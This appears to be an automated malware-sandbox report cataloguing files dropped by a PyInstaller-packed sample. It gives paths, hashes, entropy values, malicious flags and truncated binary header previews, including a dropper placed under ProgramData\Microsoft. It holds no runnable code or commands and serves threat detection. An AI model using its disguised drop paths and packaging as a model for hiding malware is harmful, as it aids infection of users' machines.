Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o~..+...+...+..."g..!...-...)...-.i.(...-...&...-...#...-.../...D...(...`g..)...+...t...D...#...D......D.k....D...*...Rich+...........................PE..d...p..f.........." ...&............`d....................................................`.............................................H.................... ..,..................................................`p..@...........................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI75642\_decimal.pyd

Download File

Process:	C:\Users\user\Desktop\TS-240605-Millenium1.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	109848
Entropy (8bit):	7.940033692006014
Encrypted:	false
SSDEEP:	3072:2cBkCziCnitddhSqZDd5jgejo8y04krK6p5DiIYOqgC9c:/ICiLzSCHjg95Zy9DHCK
MD5:	8B623D42698BF8A7602243B4BE1F775D
SHA1:	F9116F4786B5687A03C75D960150726843E1BC25
SHA-256:	7C2F0A65E38179170DC69E1958E7D21E552ECA46FCF62BBB842B4F951A86156C
SHA-512:	AA1B497629D7E57B960E4B0AB1EA3C28148E2D8EBD02905E89B365F508B945A49AACFBD032792101668A32F8666F8C4EF738DE7562979B7CF89E0211614FA21A
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........hW.....................f.......f.......f.......f.......f......................f.......f.......f.......f.......f......Rich............PE..d...c..f.........." ...&.p...................................................0............`..........................................,..P....)....... ...........'...........-..........................................@...........................................UPX0....................................UPX1.....p.......l..................@....rsrc........ .......p..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI75642\_hashlib.pyd

Download File

Process:	C:\Users\user\Desktop\TS-240605-Millenium1.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	36632
Entropy (8bit):	7.6509624792548525
Encrypted:	false
SSDEEP:	768:46bvUQL1bqnnrXTvDpovwIYOI7O5YiSyvPAAMxkEXm:3MQRbqnzSvwIYOI7k7Syuxrm
MD5:	D71DF4F6E94BEA5E57C267395AD2A172
SHA1:	5C82BCA6F2CE00C80E6FE885A651B404052AC7D0
SHA-256:	8BC92B5A6C1E1C613027C8F639CD8F9F1218FC4F7D5526CFCB9C517A2E9E14C2
SHA-512:	E794D9AE16F9A2B0C52E0F9C390D967BA3287523190D98279254126DB907BA0E5E87E5525560273798CC9F32640C33C8D9F825FF473524D91B664FE91E125549
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~z.@:.r.:.r.:.r.3c..>.r.<.s.8.r.<.w.6.r.<.v.2.r.<.q.9.r.U.s.8.r.qcs.8.r...s.9.r.:.s...r.U...;.r.U.r.;.r.U...;.r.U.p.;.r.Rich:.r.........PE..d......f.........." ...&.P...........!.......................................@............`.........................................\|;..P....9.......0.......................;.......................................-..@...........................................UPX0....................................UPX1.....P.......P..................@....rsrc........0.......T..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI75642\_lzma.pyd

Download File

Process:	C:\Users\user\Desktop\TS-240605-Millenium1.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	88344
Entropy (8bit):	7.9169630929403905
Encrypted:	false
SSDEEP:	1536:hrahPO+MVHyw7e8z0RvFCbqZizJDhNvf2sAwwh0ZmHNzay0IYZ1dP7Syexg:dChw7ey0RvwqWDbvOfh0ZmmIYZ1dPf
MD5:	932147AC29C593EB9E5244B67CF389BB
SHA1:	3584FF40AB9AAC1E557A6A6009D10F6835052CDE
SHA-256:	BDE9BCCB972D356B8DE2DC49A4D21D1B2F9711BBC53C9B9F678B66F16CA4C5D3
SHA-512:	6E36B8D8C6DC57A0871F0087757749C843EE12800A451185856A959160F860402AA16821C4EA659EA43BE2C44FCDB4DF5C0F889C21440ACEB9EE1BC57373263C
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........3..MR..MR..MR..D..IR..K..OR..K..AR..K..ER..K..NR.."..NR.....OR..MR..+R.."..wR.."..LR..".j.LR.."..LR..RichMR..........PE..d......f.........." ...&. ................................................................`.........................................4...L....................P..........................................................@...........................................UPX0....................................UPX1..... ..........................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI75642\_socket.pyd

Download File

Process:	C:\Users\user\Desktop\TS-240605-Millenium1.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	44312
Entropy (8bit):	7.700849446491776
Encrypted:	false
SSDEEP:	768:MKyC5RumAPKm822kI+Ud/erhgTF0GTp0G3IYLwWFi5YiSyvlcAMxkE3:zyC5u25/eWGFG3IYLwWFA7Syt6xr
MD5:	2957B2D82521ED0198851D12ED567746
SHA1:	AD5FD781490EE9B1AD2DD03E74F0779FB5F9AFC2
SHA-256:	1E97A62F4F768FA75BAC47BBA09928D79B74D84711B6488905F8429CD46F94A2
SHA-512:	B557CF3FE6C0CC188C6ACC0A43B44F82FCF3A6454F6ED7A066D75DA21BB11E08CFA180699528C39B0075F4E79B0199BB05E57526E8617036411815AB9F406D35
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:!..~@..~@..~@..w8@.x@..x...\|@..x...s@..x...v@..x...}@......\|@..~@...@..58..y@.......@.......@....,..@.......@..Rich~@..........PE..d......f.........." ...&.p.......... m....................................................`.............................................P.......h............ ..x...........X.......................................0y..@...........................................UPX0....................................UPX1.....p.......l..................@....rsrc................p..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI75642\base_library.zip

Download File

Process:	C:\Users\user\Desktop\TS-240605-Millenium1.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1443565
Entropy (8bit):	5.590585212949354
Encrypted:	false
SSDEEP:	24576:mQR5pATG8/R5lUKdcubgAnyfbM3AOwjwhBdmzRPFaUHHd:mQR5pE/RtQ/P
MD5:	4B011F052728AE5007F9EC4E97A4F625
SHA1:	9D940561F08104618EC9E901A9CD0CD13E8B355D
SHA-256:	C88CD8549DEBC046A980B0BE3BF27956AE72DCDCF1A448E55892194752C570E6
SHA-512:	BE405D80D78A188A563086809C372C44BCD1CCAB5A472D50714F559559795A1DF49437C1712E15EB0403917C7F6CFAF872D6BB0C8E4DD67A512C2C4A5AE93055
Malicious:	false
Preview:	PK..........!.h%..b...b......._collections_abc.pyc............................................d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.........................Z...e.d...............Z.d...Z...e.e...............Z.[.g.d...Z.d.Z...e...e.d.............................Z...e...e...e...........................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.g.............................Z...e...e...e.g...........................................Z...e...e...e.d...........................................Z...e...e...e.d.d.z.............................................Z...e...e...e...........................................Z...e...e.d.............................Z ..e...e.d.............................Z!..e...e...e"..........................................Z#..e.i.......................................

C:\Users\user\AppData\Local\Temp\_MEI75642\libcrypto-3.dll

Download File

Process:	C:\Users\user\Desktop\TS-240605-Millenium1.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1635096
Entropy (8bit):	7.95287803315892
Encrypted:	false
SSDEEP:	49152:z6H83HeiR86t/czBf6Y1z8kq5HaMpW/9nn3nL/obN1CPwDvt3uFlDCP:z6c3CFFz8BBpWtbU1CPwDvt3uFlDCP
MD5:	7F1B899D2015164AB951D04EBB91E9AC
SHA1:	1223986C8A1CBB57EF1725175986E15018CC9EAB
SHA-256:	41201D2F29CF3BC16BF32C8CECF3B89E82FEC3E5572EB38A578AE0FB0C5A2986
SHA-512:	CA227B6F998CACCA3EB6A8F18D63F8F18633AB4B8464FB8B47CAA010687A64516181AD0701C794D6BFE3F153662EA94779B4F70A5A5A94BB3066D8A011B4310D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............l..l..l......l...m..l...i..l...h..l...o..l..m.y.l...m...l...o..l...h.l...l..l......l...n..l.Rich.l.........PE..d......e.........." ...%.0........9.`.O...9...................................R...........`......................................... .P......P.h.....P.......K.d............R..................................... .O.@...........................................UPX0......9.............................UPX1.....0....9..0..................@....rsrc.........P......4..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI75642\python311.dll

Download File

Process:	C:\Users\user\Desktop\TS-240605-Millenium1.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1713432
Entropy (8bit):	7.993772635826383
Encrypted:	true
SSDEEP:	49152:ourykeLOskGnvqFtCxkwGrZ84z4Kzov9ra:9rmLFpvqFtwkwGr74TM
MD5:	CCDBD8027F165575A66245F8E9D140DE
SHA1:	D91786422CE1F1AD35C528D1C4CD28B753A81550
SHA-256:	503CD34DAED4F6D320731B368BBD940DBAC1FF7003321A47D81D81D199CCA971
SHA-512:	870B54E4468DB682B669887AEEF1FFE496F3F69B219BDA2405AC502D2DCD67B6542DB6190EA6774ABF1DB5A7DB429CE8F6D2FC5E88363569F15CF4DF78DA2311
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oX..+9..+9..+9..-...)9..-.s.%9..-...'9..-...#9..-.../9.."A..19..`A.. 9..+9..I8..D....9..D...9..D.q.9..D...*9..Rich+9..........PE..d...O..f.........." ...&. ........E. /^.. E.................................. _...........`.........................................HO^......I^......@^......0W.p0..........(._.....................................8;^.@...........................................UPX0......E.............................UPX1..... ... E.....................@....rsrc........@^......"..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI75642\select.pyd

Download File

Process:	C:\Users\user\Desktop\TS-240605-Millenium1.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26392
Entropy (8bit):	7.425924737621776
Encrypted:	false
SSDEEP:	384:zKWIzVcBuVEZhWsKZa7gJXJDNIYQG76eHQIYiSy1pCQuRWAM+o/8E9VF0NyMl+:zKLVKZhWtpZDNIYQG7H5YiSyvHAMxkEN
MD5:	E021CF8D94CC009FF79981F3472765E7
SHA1:	C43D040B0E84668F3AE86ACC5BD0DF61BE2B5374
SHA-256:	AB40BF48A6DB6A00387AECE49A03937197BC66B4450559FEEC72B6F74FC4D01E
SHA-512:	C5CA57F8E4C0983D9641412E41D18ABD16FE5868D016A5C6E780543860A9D3B37CC29065799951CB13DC49637C45E02EFB6B6FFEAF006E78D6CE2134EB902C67
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&.tb..'b..'b..'k.V'`..'d(.&`..'d(.&n..'d(.&j..'d(.&f..'.(.&`..'b..' ..')..&g..'.(.&c..'.(.&c..'.(:'c..'.(.&c..'Richb..'........PE..d...g..f.........." ...&.0..........`.....................................................`......................................... ...L....................`..............l.......................................p...@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI75642\unicodedata.pyd

Download File

Process:	C:\Users\user\Desktop\TS-240605-Millenium1.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	302360
Entropy (8bit):	7.985785632382362
Encrypted:	false
SSDEEP:	6144:49ZYAfLNgtllsyylxgsElkuO9Mj9SMDQCaCAjEaukkCTq/kP0zqEuv2urp:zATNgtIyylKsEeuEIDNafERxuRvdrp
MD5:	BC28491251D94984C8555ED959544C11
SHA1:	964336B8C045BF8BB1F4D12DE122CFC764DF6A46
SHA-256:	F308681EF9C4BB4EA6ADAE93939466DF1B51842554758CB2D003131D7558EDD4
SHA-512:	042D072D5F73FE3CD59394FC59436167C40B4E0CF7909AFCAD1968E0980B726845F09BF23B4455176B12083A91141474E9E0B7D8475AFB0E3DE8E1E4DBAD7EC0
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........aM...#...#...#..x....#.."...#..&...#..'...#.. ...#..."...#..x"...#..."...#.......#...#...#......#...!...#.Rich..#.................PE..d...h..f.........." ...&.`.......@.......P................................................`.............................................X....................P..T.......................................................@...........................................UPX0.....@..............................UPX1.....`...P...\..................@....rsrc................`..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI78002\VCRUNTIME140.dll

Download File

Process:	C:\ProgramData\Microsoft\hacn.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	98224
Entropy (8bit):	6.452201564717313
Encrypted:	false
SSDEEP:	1536:ywqHLG4SsAzAvadZw+1Hcx8uIYNUzUoHA4decbK/zJNuw6z5U:ytrfZ+jPYNzoHA4decbK/FNu51U
MD5:	F34EB034AA4A9735218686590CBA2E8B
SHA1:	2BC20ACDCB201676B77A66FA7EC6B53FA2644713
SHA-256:	9D2B40F0395CC5D1B4D5EA17B84970C29971D448C37104676DB577586D4AD1B1
SHA-512:	D27D5E65E8206BD7923CF2A3C4384FEC0FC59E8BC29E25F8C03D039F3741C01D1A8C82979D7B88C10B209DB31FBBEC23909E976B3EE593DC33481F0050A445AF
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*..qn.."n.."n.."...#l.."g.."e.."n.."B.."<..#c.."<..#~.."<..#q.."<..#o.."<.g"o.."<..#o.."Richn.."................PE..d...%\|.a.........." .........`......p................................................{....`A.........................................B..4....J...............p..X....X...'..........h,..T............................,..8............................................text............................... ..`.rdata...@.......B..................@..@.data...@....`.......@..............@....pdata..X....p.......D..............@..@_RDATA...............P..............@..@.rsrc................R..............@..@.reloc...............V..............@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI78002\_bz2.pyd

Download File

Process:	C:\ProgramData\Microsoft\hacn.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	83736
Entropy (8bit):	6.595094797707322
Encrypted:	false
SSDEEP:	1536:hXOz78ZqjUyAsIi7W/5+D8W35mjZm35ILCVM7SyfYPxe:pOzwpyAFi7WMgW34jZm35ILCVMZoxe
MD5:	86D1B2A9070CD7D52124126A357FF067
SHA1:	18E30446FE51CED706F62C3544A8C8FDC08DE503
SHA-256:	62173A8FADD4BF4DD71AB89EA718754AA31620244372F0C5BBBAE102E641A60E
SHA-512:	7DB4B7E0C518A02AE901F4B24E3860122ACC67E38E73F98F993FE99EB20BB3AA539DB1ED40E63D6021861B54F34A5F5A364907FFD7DA182ADEA68BBDD5C2B535
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.>...m...m...m.}<m...m.p.l...m.jRm...m.p.l...m.p.l...m.p.l...mup.l...m.}.l...m...m...mup.l...mup.l...mupPm...mup.l...mRich...m................PE..d.....,d.........." .........\..............................................P............`......................................... ...H...h........0....... ..,......../...@......`...T...............................8............................................text.............................. ..`.rdata...=.......>..................@..@.data...............................@....pdata..,.... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI78002\_decimal.pyd

Download File

Process:	C:\ProgramData\Microsoft\hacn.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	254744
Entropy (8bit):	6.564308911485739
Encrypted:	false
SSDEEP:	6144:3LT2sto29vTlN5cdIKdo4/3VaV8FlBa9qWMa3pLW1A/T8O51j4iab9M:H2s/9vTlPcdk4vVtFU98iIu
MD5:	20C77203DDF9FF2FF96D6D11DEA2EDCF
SHA1:	0D660B8D1161E72C993C6E2AB0292A409F6379A5
SHA-256:	9AAC010A424C757C434C460C3C0A6515D7720966AB64BAD667539282A17B4133
SHA-512:	2B24346ECE2CBD1E9472A0E70768A8B4A5D2C12B3D83934F22EBDC9392D9023DCB44D2322ADA9EDBE2EB0E2C01B5742D2A83FA57CA23054080909EC6EB7CF3CA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........76..VX..VX..VX.....VX..#Y..VX..#]..VX..#\..VX..#[..VX.t#Y..VX...Y..VX..VY.+VX.t#[..VX.t#U..VX.t#X..VX.t#...VX.t#Z..VX.Rich.VX.........................PE..d.....,d.........." .....\|...:.......................................................r....`..........................................T..P...0U...................'......./......<...0...T...............................8............................................text....{.......\|.................. ..`.rdata..............................@..@.data....)...p...$...X..............@....pdata...'.......(...\|..............@..@.rsrc...............................@..@.reloc..<...........................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI78002\_hashlib.pyd

Download File

Process:	C:\ProgramData\Microsoft\hacn.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	64792
Entropy (8bit):	6.223467179037751
Encrypted:	false
SSDEEP:	1536:/smKJPganCspF1dqZAC2QjP2RILOIld7SyEPxDF:/smKpgNoF1dqZDnjP2RILOIv2xB
MD5:	D4674750C732F0DB4C4DD6A83A9124FE
SHA1:	FD8D76817ABC847BB8359A7C268ACADA9D26BFD5
SHA-256:	CAA4D2F8795E9A55E128409CC016E2CC5C694CB026D7058FC561E4DD131ED1C9
SHA-512:	97D57CFB80DD9DD822F2F30F836E13A52F771EE8485BC0FD29236882970F6BFBDFAAC3F2E333BBA5C25C20255E8C0F5AD82D8BC8A6B6E2F7A07EA94A9149C81E
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q..b?..b?..b?......b?..>..b?..:..b?..;..b?..<..b?.2.>..b?..>..b?.7.>..b?..b>.pb?.2.2..b?.2.?..b?.2....b?.2.=..b?.Rich.b?.........PE..d.....,d.........." .....P...........<....................................................`............................................P...0............................/......T....k..T............................k..8............`.. ............................text....N.......P.................. ..`.rdata..4P...`...R...T..............@..@.data...H...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI78002\_lzma.pyd

Download File

Process:	C:\ProgramData\Microsoft\hacn.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	158488
Entropy (8bit):	6.8491143497239655
Encrypted:	false
SSDEEP:	3072:j0k3SXjD9aWpAn3rb7SbuDlvNgS4fWqEznfo9mNoFTSlXZ8Ax5ILZ1GIxq:j0kiXjD9v8X7Euk4wYOFTafxn
MD5:	7447EFD8D71E8A1929BE0FAC722B42DC
SHA1:	6080C1B84C2DCBF03DCC2D95306615FF5FCE49A6
SHA-256:	60793C8592193CFBD00FD3E5263BE4315D650BA4F9E4FDA9C45A10642FD998BE
SHA-512:	C6295D45ED6C4F7534C1A38D47DDC55FEA8B9F62BBDC0743E4D22E8AD0484984F8AB077B73E683D0A92D11BF6588A1AE395456CFA57DA94BB2A6C4A1B07984DE
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........l.M...M...M...D..I.......O.......F.......E.......N.......N.......O...M...(.......w.......L.......L.......L...RichM...................PE..d...&.,d.........." .....`..........p3...............................................4....`.............................................L.......x....`.......@.......<.../...p..D...H{..T............................{..8............p...............................text....^.......`.................. ..`.rdata.......p.......d..............@..@.data........0......................@....pdata.......@......................@..@.rsrc........`.......0..............@..@.reloc..D....p.......:..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI78002\_socket.pyd

Download File

Process:	C:\ProgramData\Microsoft\hacn.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	79128
Entropy (8bit):	6.284790077237953
Encrypted:	false
SSDEEP:	1536:ZmtvsXhgzrojAs9/s+S+pGLypbyxk/DDTBVILLwX7SyiPx9:c56OzyAs9/sT+pGLypb+k/XFVILLwX4f
MD5:	819166054FEC07EFCD1062F13C2147EE
SHA1:	93868EBCD6E013FDA9CD96D8065A1D70A66A2A26
SHA-256:	E6DEB751039CD5424A139708475CE83F9C042D43E650765A716CB4A924B07E4F
SHA-512:	DA3A440C94CB99B8AF7D2BC8F8F0631AE9C112BD04BADF200EDBF7EA0C48D012843B4A9FB9F1E6D3A9674FD3D4EB6F0FA78FD1121FAD1F01F3B981028538B666
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~...:...:...:...3.i.<...h...8...h...6...h...2...h...9.......8...:.......q...=.......;.......;.......;.......;...Rich:...........PE..d.....,d.........." .....l...........%.......................................P............`.............................................P............0....... ..<......../...@..........T..............................8............................................text...fj.......l.................. ..`.rdata..Ts.......t...p..............@..@.data...............................@....pdata..<.... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI78002\base_library.zip

Download File

Process:	C:\ProgramData\Microsoft\hacn.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	880569
Entropy (8bit):	5.682988287908638
Encrypted:	false
SSDEEP:	12288:lgYJu4KXWyBC6S4IEa8A4a2YWD3dOVwx/fpEWertSLMNE:lgYJiVBFLa2VIVwx/fpEWe+MNE
MD5:	483D9675EF53A13327E7DFC7D09F23FE
SHA1:	2378F1DB6292CD8DC4AD95763A42AD49AEB11337
SHA-256:	70C28EC0770EDEFCEF46FA27AAA08BA8DC22A31ACD6F84CB0B99257DCA1B629E
SHA-512:	F905EB1817D7D4CC1F65E3A5A01BADE761BCA15C4A24AF7097BC8F3F2B43B00E000D6EA23CD054C391D3FDC2F1114F2AF43C8BB6D97C1A0CE747763260A864F5
Malicious:	false
Preview:	PK..........!..^".5...5......._collections_abc.pyco....................................@.......d.Z.d.d.l.m.Z.m.Z...d.d.l.Z.e.e.e.....Z.e.d...Z.d.d...Z.e.e...Z.[.g.d...Z.d.Z.e.e.d.....Z.e.e.e.......Z.e.e.i.........Z.e.e.i.........Z.e.e.i.........Z.e.e.g.....Z.e.e.e.g.......Z.e.e.e.d.......Z.e.e.e.d.d.>.......Z.e.e.e.......Z.e.e.d.....Z e.e.d.....Z!e.e.e"......Z#e.i.......Z$e.i.......Z%e.i.......Z&e.e.j'..Z(e.d.d.......Z)d.d...Ze..Ze.e..Z+e.,....[d.d...Z-e-..Z-e.e-..Z.[-d.d...Z/G.d.d...d.e.d...Z0G.d.d...d.e.d...Z1G.d.d...d.e1..Z2e2.3e+....G.d.d...d.e.d...Z4G.d.d ..d e4..Z5G.d!d"..d"e5..Z6e6.3e.....G.d#d$..d$e.d...Z7G.d%d&..d&e7..Z8e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e.....e8.3e ....e8.3e!....e8.3e#....G.d'd(..d(e7..Z9G.d)d..de8..Z:e:.3e)....G.d+d,..d,e.d...Z;G.d-d...d.e.d...Z<G.d/d0..d0e;e7e<..Z=G.d1d2..d2e...Z>d3d4..Z?d5d6..Z@d7d8..ZAG.d9d:..d:e.d...ZBG.d;d<..d<e=..ZCeC.3eD....G.d=d>..d>eC..ZEeE.3e.....G.d?d@..d@e=..ZFeF

C:\Users\user\AppData\Local\Temp\_MEI78002\libcrypto-1_1.dll

Download File

Process:	C:\ProgramData\Microsoft\hacn.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	3450648
Entropy (8bit):	6.098075450035195
Encrypted:	false
SSDEEP:	98304:YP+uemAdn67xfxw6rKsK1CPwDv3uFfJz1CmiX:OZemAYxfxw6HK1CPwDv3uFfJzUmA
MD5:	9D7A0C99256C50AFD5B0560BA2548930
SHA1:	76BD9F13597A46F5283AA35C30B53C21976D0824
SHA-256:	9B7B4A0AD212095A8C2E35C71694D8A1764CD72A829E8E17C8AFE3A55F147939
SHA-512:	CB39AA99B9D98C735FDACF1C5ED68A4D09D11F30262B91F6AA48C3F8520EFF95E499400D0CE7E280CA7A90FF6D7141D2D893EF0B33A8803A1CADB28BA9A9E3E2
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........].q...q...q....M..q.......q.......q.......q.......q...q..[q.......q.......q.......s.......q....!..q.......q..Rich.q..........................PE..d......c.........." ..."..$.................................................. 5......%5...`.........................................../..h...Z4.@.....4.\|.....2......x4../....4..O....-.8.............................-.@............P4..............................text.....$.......$................. ..`.rdata..&.....%.......$.............@..@.data...!z....2..,....1.............@....pdata........2.......2.............@..@.idata..^#...P4..$....3.............@..@.00cfg..u.....4.......3.............@..@.rsrc...\|.....4.......3.............@..@.reloc...y....4..z....3.............@..B................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI78002\python310.dll

Download File

Process:	C:\ProgramData\Microsoft\hacn.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4458776
Entropy (8bit):	6.460390021076921
Encrypted:	false
SSDEEP:	49152:myrXfGIy+Bqk5c5Ad2nwZT3Q6wsV136cR2DZvbK30xLNZcAgVBvcpYcvl1IDWbH3:Uw5tVBlicWdvoDkHUMF7Ph/qe
MD5:	63A1FA9259A35EAEAC04174CECB90048
SHA1:	0DC0C91BCD6F69B80DCDD7E4020365DD7853885A
SHA-256:	14B06796F288BC6599E458FB23A944AB0C843E9868058F02A91D4606533505ED
SHA-512:	896CAA053F48B1E4102E0F41A7D13D932A746EEA69A894AE564EF5A84EF50890514DECA6496E915AAE40A500955220DBC1B1016FE0B8BCDDE0AD81B2917DEA8B
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]...<...<...<...I...<...Sc..<...I...<...I...<...I...<...D...<...D...<...<...=..+I../<..+I...<..+Ia..<..+I...<..Rich.<..........................PE..d.....,d.........." .....V#..v!...............................................E.....".D...`.........................................`.<.....@.=.\|.....D......`B.......C../....D..t....$.T...........................P.$.8............p#.8............................text...bT#......V#................. ..`.rdata...B...p#..D...Z#.............@..@.data... .....=.......=.............@....pdata.......`B......HA.............@..@PyRuntim`....pD......VC.............@....rsrc.........D......ZC.............@..@.reloc...t....D..v...dC.............@..B........................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe

Download File

Process:	C:\ProgramData\Microsoft\hacn.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19846974
Entropy (8bit):	7.998622680328521
Encrypted:	true
SSDEEP:	393216:R+4ZXxd1jEfniX1H4Ei8oTwLpKwjQ6qcx+5jmJZ4uqBVTkLDs6:RRfjEfnilH49HM9jQ6qpXHEQ6
MD5:	8198AD352AB70C2C974AB5C716956CD7
SHA1:	AC9AF7C21EA6F1181F1B4EE9599C78DDA98DED4F
SHA-256:	1AD182A75CA930D93521CBF94A5A41BBAAF661586FCCD4F660FF2E6BE4AA208F
SHA-512:	E9DEDB10C55127F6846C3D0F59ECE37EF349FFC23EAFB74713207DCF86F223E47D34BDF7E8F34527CC262A43A8CCFC2FA7F5A4DE1D0D327B7F082495B131879E
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I.>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I.=>...I..=>..Rich<>..........PE..L..... b............................0........0....@..........................`............@.........................p...4.......P....@..P....................0..<#......T............................U..@............0..x....... ....................text............................... ..`.rdata.......0....... ..............@..@.data... G..........................@....didat.......0......................@....rsrc...P....@......................@..@.reloc..<#...0...$..................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI78002\select.pyd

Download File

Process:	C:\ProgramData\Microsoft\hacn.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	29976
Entropy (8bit):	6.627859470728624
Encrypted:	false
SSDEEP:	768:gUC2hwhVHqOmEVILQG35YiSyvrYPxWEl6:FC2ehVKOmEVILQGp7SyEPxe
MD5:	A653F35D05D2F6DEBC5D34DADDD3DFA1
SHA1:	1A2CEEC28EA44388F412420425665C3781AF2435
SHA-256:	DB85F2F94D4994283E1055057372594538AE11020389D966E45607413851D9E9
SHA-512:	5AEDE99C3BE25B1A962261B183AE7A7FB92CB0CB866065DC9CD7BB5FF6F41CC8813D2CC9DE54670A27B3AD07A33B833EAA95A5B46DAD7763CA97DFA0C1CE54C9
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........!.F.O.F.O.F.O.O...D.O...N.D.O...J.M.O...K.N.O...L.B.O...N.D.O.F.N...O...N.C.O...B.G.O...O.G.O....G.O...M.G.O.RichF.O.................PE..d.....,d.........." .........0......................................................;\....`.........................................`@..L....@..x....p.......`.......F.../......H....2..T............................2..8............0...............................text............................... ..`.rdata.......0......................@..@.data........P.......4..............@....pdata.......`.......6..............@..@.rsrc........p.......:..............@..@.reloc..H............D..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI78002\unicodedata.pyd

Download File

Process:	C:\ProgramData\Microsoft\hacn.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1123608
Entropy (8bit):	5.3853088605790385
Encrypted:	false
